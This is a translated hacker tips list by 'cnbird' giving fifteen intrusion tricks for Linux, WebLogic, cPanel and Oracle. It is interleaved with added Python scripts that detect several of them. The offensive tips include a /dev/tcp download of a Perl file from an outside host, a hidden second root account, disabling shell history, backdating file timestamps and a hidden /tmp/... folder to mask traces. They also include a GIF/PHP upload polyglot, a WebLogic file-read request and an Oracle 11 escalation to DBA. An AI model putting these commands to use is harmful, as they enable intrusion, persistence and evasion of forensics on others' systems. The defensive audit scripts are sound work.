By: cnbird
1. Download a file without wget, nc or other download tools (bash's built-in /dev/tcp)
exec 5<>/dev/tcp/yese.yi.org/80 && echo -e "GET /c.pl HTTP/1.0\n\n" >&5 && cat <&5 > c.pl
2. Add a user with uid 0 (a second root) on Linux
useradd -o -u 0 cnbird
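A defender's counterpart to this tip, added here as an example and not part of cnbird's original list: a small audit that parses /etc/passwd-format text and reports every account that shares uid 0 with root, which is exactly what useradd -o -u 0 creates. The passwd content below is constructed for the demonstration; audit_passwd_file() is an assumed helper name that reads the live file.

```python
# Added example (not from the original post): find extra uid-0 accounts in
# /etc/passwd-style text. The sample content is constructed for the demo.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
cnbird:x:0:0::/home/cnbird:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""


def parse_passwd(text):
    """Yield (name, uid, gid, home, shell) for each well-formed passwd line."""
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        yield name, int(uid), int(gid), home, shell


def find_extra_root_accounts(text):
    """Return the names of all uid-0 accounts other than 'root', sorted."""
    return sorted(name for name, uid, *_ in parse_passwd(text)
                  if uid == 0 and name != "root")


def audit_passwd_file(path="/etc/passwd"):
    """Assumed helper: run the same check against a real passwd file."""
    with open(path, encoding="utf-8") as fh:
        return find_extra_root_accounts(fh.read())


if __name__ == "__main__":
    print("extra uid-0 accounts in sample:", find_extra_root_accounts(SAMPLE_PASSWD))
```

Any name it returns besides root should be explained or removed; pairing it with a look at /etc/shadow shows whether such an account also has a usable password hash.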
3. Keep bash from writing the history record
export HISTSIZE=0
export HISTFILE=/dev/null
4. SSH reverse tunnel
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p <port>    (-p gives the SSH port of the remote server)
Then, on the server, run: ssh localhost -p 44
5. WebLogic local file reading vulnerability
curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management
6. View the virtual hosts configured in Apache
./httpd -t -D DUMP_VHOSTS
7. CVS penetration tips
CVSROOT/passwd    UNIX SHA1 password file
CVSROOT/readers
CVSROOT/writers
CVS/Root
CVS/Entries       files and directories updated by CVS
CVS/Repository
8. cPanel path leakage
/3rdparty/squirrelmail/functions/plugin.php
9. Modify the timestamp of an uploaded file (to mask intrusion traces)
touch -r <old file> <new file>    (copies the old file's timestamp onto the new file)
10. Search for the target host's webshell with Baidu and Google
intitle:PHPJackal 1t1t
11. Miscellaneous additions
Create a temporary "hidden" directory: mkdir /tmp/...
The /tmp/... directory stays "hidden" while the administrator is asleep; you can park some exploits there temporarily.
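Items 9 and 11 both leave artifacts a responder can look for. The script below is an added example, not part of the original list: it walks a directory tree, flags entries whose names consist only of dots and spaces (the /tmp/... trick), and flags regular files whose modification time sits far before their ctime, because touch -r can copy mtime from another file but the kernel still stamps ctime with the moment of that change. The demo tree it builds under a temporary directory is constructed for the example, and the 3600-second threshold is an assumed tuning value.

```python
# Added example (not from the original post): filesystem triage for the
# artifacts left by items 9 (touch -r) and 11 (mkdir /tmp/...).
import os
import re
import shutil
import tempfile
import time

DOT_SPACE_ONLY = re.compile(r"^[. ]+$")   # names such as "...", ". ", ".. "
BACKDATE_THRESHOLD = 3600                  # assumed: mtime this far before ctime is suspicious


def is_hidden_junk_name(name):
    """True for names made only of dots/spaces (os.listdir never yields '.' or '..')."""
    return bool(DOT_SPACE_ONLY.match(name))


def mtime_backdated(path, threshold=BACKDATE_THRESHOLD):
    """touch -r rewrites atime/mtime, but ctime is set by the kernel to 'now';
    a large ctime-mtime gap is the tell-tale."""
    st = os.lstat(path)
    return (st.st_ctime - st.st_mtime) > threshold


def triage(root, threshold=BACKDATE_THRESHOLD):
    """Return (kind, path) findings for every suspicious entry under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if is_hidden_junk_name(name):
                findings.append(("dot-only name", full))
            if os.path.isfile(full) and not os.path.islink(full) \
                    and mtime_backdated(full, threshold):
                findings.append(("mtime backdated", full))
    return findings


def build_demo_tree():
    """Constructed fixture: a /tmp/...-style directory holding a file whose
    mtime was set a year back (the effect of item 9), plus one normal file."""
    root = tempfile.mkdtemp(prefix="triage-demo-")
    os.mkdir(os.path.join(root, "..."))
    backdated = os.path.join(root, "...", "exp.sh")
    with open(backdated, "w") as fh:
        fh.write("#!/bin/sh\n")
    year_ago = time.time() - 365 * 86400
    os.utime(backdated, (year_ago, year_ago))   # ctime still becomes "now"
    with open(os.path.join(root, "normal.txt"), "w") as fh:
        fh.write("hello\n")
    return root


def demo():
    """Build the fixture, triage it, clean up, and return the finding kinds."""
    root = build_demo_tree()
    try:
        return sorted(kind for kind, _ in triage(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Because ctime cannot be set through utime(2), the mtime/ctime comparison survives item 9 on a live system; only direct disk writes or clock manipulation defeat it, so pair it with centralized logging of the original upload time.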
12. Use Linux output redirection to bypass GIF checks
printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php
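The trick above works against upload filters that only look at the first bytes of a file. The validator below is an added example, not from the original post: it checks the GIF signature and logical screen descriptor, requires the GIF trailer byte, requires a .gif extension, and scans the whole body for script markers, so the polyglot from item 12 is rejected for three separate reasons while a genuine 1x1 GIF passes. Both sample files and the marker list are constructed for the demonstration.

```python
# Added example (not from the original post): an upload validator that is not
# fooled by a GIF header prepended to PHP code.

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")   # constructed list
GIF_TRAILER = b"\x3b"

# Constructed samples: the polyglot from item 12 and a genuine minimal 1x1 GIF.
POLYGLOT = b"GIF89a\x01\x00\x01\x00<?php phpinfo();?>"
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b"\x21\xf9\x04\x01\x00\x00\x00\x00"
            b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")


def gif_dimensions(data):
    """Return (width, height) from the logical screen descriptor, or None
    if the data does not start with a GIF signature."""
    if len(data) < 10 or data[:6] not in GIF_SIGNATURES:
        return None
    return int.from_bytes(data[6:8], "little"), int.from_bytes(data[8:10], "little")


def validate_gif_upload(data, filename):
    """Return a list of rejection reasons; an empty list means accept."""
    reasons = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext != "gif":
        reasons.append(f"extension .{ext} is not .gif")
    if gif_dimensions(data) is None:
        reasons.append("missing GIF header / screen descriptor")
    elif not data.endswith(GIF_TRAILER):
        reasons.append("missing GIF trailer byte 0x3B")
    lowered = data.lower()            # catch <?PHP and <SCRIPT as well
    for marker in SCRIPT_MARKERS:
        if marker in lowered:
            reasons.append(f"script marker {marker!r} found in body")
    return reasons


if __name__ == "__main__":
    print("real gif:", validate_gif_upload(REAL_GIF, "logo.gif"))
    print("polyglot:", validate_gif_upload(POLYGLOT, "poc.php"))
```

Marker scanning is a useful second line; the first line is to store uploads outside any directory the web server will execute and to re-encode images on the way in, so that whatever survives is pixel data only.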
13. Reading environment variables is very helpful when gathering information
/proc/self/environ
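Items 3 and 13 meet in the same place: the environment of a running process. The script below is an added example and not part of the original list. It parses the NUL-separated KEY=VALUE format of /proc/<pid>/environ, flags the history-suppressing settings from item 3 (HISTSIZE=0, HISTFILE=/dev/null and similar), and lists variables whose names look like secrets, which is what makes item 13 valuable to an attacker. The sample environ blob is constructed; audit_process_environ() is an assumed helper that reads a live process.

```python
# Added example (not from the original post): audit a /proc/<pid>/environ blob
# for anti-history settings (item 3) and secret-bearing variables (item 13).
import re

# Constructed sample in /proc/<pid>/environ format: NUL-separated KEY=VALUE pairs.
SAMPLE_ENVIRON = (
    b"SHELL=/bin/bash\x00USER=www-data\x00HISTSIZE=0\x00HISTFILE=/dev/null\x00"
    b"DB_PASSWORD=hunter2\x00PATH=/usr/bin:/bin\x00"
)


def parse_environ(blob):
    """Turn a NUL-separated environ blob into a dict; malformed entries are skipped."""
    env = {}
    for item in blob.split(b"\x00"):
        if not item:
            continue
        key, sep, value = item.partition(b"=")
        if not sep:
            continue
        env[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env


# Assumed rule set: values that disable or discard the shell history.
HISTORY_SUPPRESSION_RULES = {
    "HISTSIZE": lambda v: v.strip() == "0",
    "HISTFILESIZE": lambda v: v.strip() == "0",
    "HISTFILE": lambda v: v.strip() in ("", "/dev/null"),
}


def flag_history_suppression(env):
    """Return 'VAR=value' strings for every history-suppressing setting present."""
    findings = []
    for var, is_suspicious in HISTORY_SUPPRESSION_RULES.items():
        if var in env and is_suspicious(env[var]):
            findings.append(f"{var}={env[var]}")
    return findings


SECRET_NAME = re.compile(r"(PASS|PASSWORD|SECRET|TOKEN|KEY)", re.I)


def find_secret_like_vars(env):
    """Names (not values) of variables that look like credentials."""
    return sorted(k for k in env if SECRET_NAME.search(k))


def audit_process_environ(pid):
    """Assumed helper: run both checks against a live process (root needed for others' PIDs)."""
    with open(f"/proc/{pid}/environ", "rb") as fh:
        env = parse_environ(fh.read())
    return flag_history_suppression(env), find_secret_like_vars(env)


if __name__ == "__main__":
    env = parse_environ(SAMPLE_ENVIRON)
    print("history suppression:", flag_history_suppression(env))
    print("secret-like vars:", find_secret_like_vars(env))
```

Secrets found this way belong in a file or secret store readable only by the service user, not in the environment, since any local file read in the web application exposes /proc/self/environ to the attacker.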
14. Privilege escalation in the latest Oracle 11 (requires only CREATE SESSION)
Uses IMPORT_JVM_PERMS in DBMS_JVM_EXP_PERMS.
Determine the logon privileges:
select * from session_privs;
  CREATE SESSION
select * from session_roles;
select TYPE_NAME, NAME, ACTION from sys.DBA_JAVA_POLICY where GRANTEE = 'GREMLIN';    (GREMLIN is the user name)
desc JAVA$POLICY$
DECLARE
  POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
  CURSOR C1 IS SELECT grant, user(), SYS, java.io.FilePermission, <all files>, execute, enable FROM DUAL;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
connect / as sysdba
col TYPE_NAME for A30;
col NAME for A30;
col ACTION for A10;
select TYPE_NAME, NAME, ACTION from sys.DBA_JAVA_POLICY where GRANTEE = user;
Connect as the ordinary user again:
set serveroutput on
exec dbms_java.set_output(10000);
select DBMS_JAVA.SET_OUTPUT_TO_JAVA(ID, oracle/aurora/rdbms/DbmsJava, SYS, writeOutputToFile, TEXT, NULL, 0, 1, 1, 1, 0, declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant dba to user; END;, begin null; END;) from dual;
exec DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(no_such_sub1_, SYSDATE());
set role dba;
select * from session_privs;
exec sys.VULNPROC(FOO "| encrypt (" ID "," declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate "" grant dba to public ""; DBMS_OUTPUT.PUT_LINE (: 1); END ;", "TEXT") | "BAR );
select DBMS_JAVA.RUNJAVA(oracle/aurora/util/Test) from dual;
set role dba;
15. WebLogic penetration tips
WebLogic Scripting Tool (WLST)
Writes to <DOMAIN_HOME>\config.xml
1. Modify: <BEA_HOME>\wlserver_10.0\server\bin\setWLSEnv.sh
2. Start WLST:
java weblogic.WLST
wls:/offline> connect('admin', 'admin', 't3://127.0.0.1:7001')
wls:/bbk/serverConfig> help()
wls:/bbk/serverConfig> edit()
wls:/bbk/serverConfig> cd('Servers')
wls:/bbk/serverConfig/Server-cnbird> cd('Log')
wls:/bbk/serverConfig/Server-cnbird/Log> cd('Server-cnbird')
wls:/bbk/serverConfig/Server-cnbird/Log/Server-cnbird> startEdit()
wls:/bbk/serverConfig/Server-cnbird/Log/Server-cnbird !> set('FileCount', 4)
wls:/bbk/serverConfig/Server-cnbird/Log/Server-cnbird !> save()
wls:/bbk/serverConfig/Server-cnbird/Log/Server-cnbird !> activate()    (submits the pending change)
wls:/bbk/serverConfig/Server-cnbird/Log/Server-cnbird !> disconnect()
wls:/offline> exit()
3. Batch mode:
Save the preceding commands as cnbird.py:
connect('admin', 'admin', 't3://127.0.0.1:7001')
cd('Servers')
cd('Log')
cd('Server-cnbird')
startEdit()
set('FileCount', 4)
save()
Then run: java weblogic.WLST cnbird.py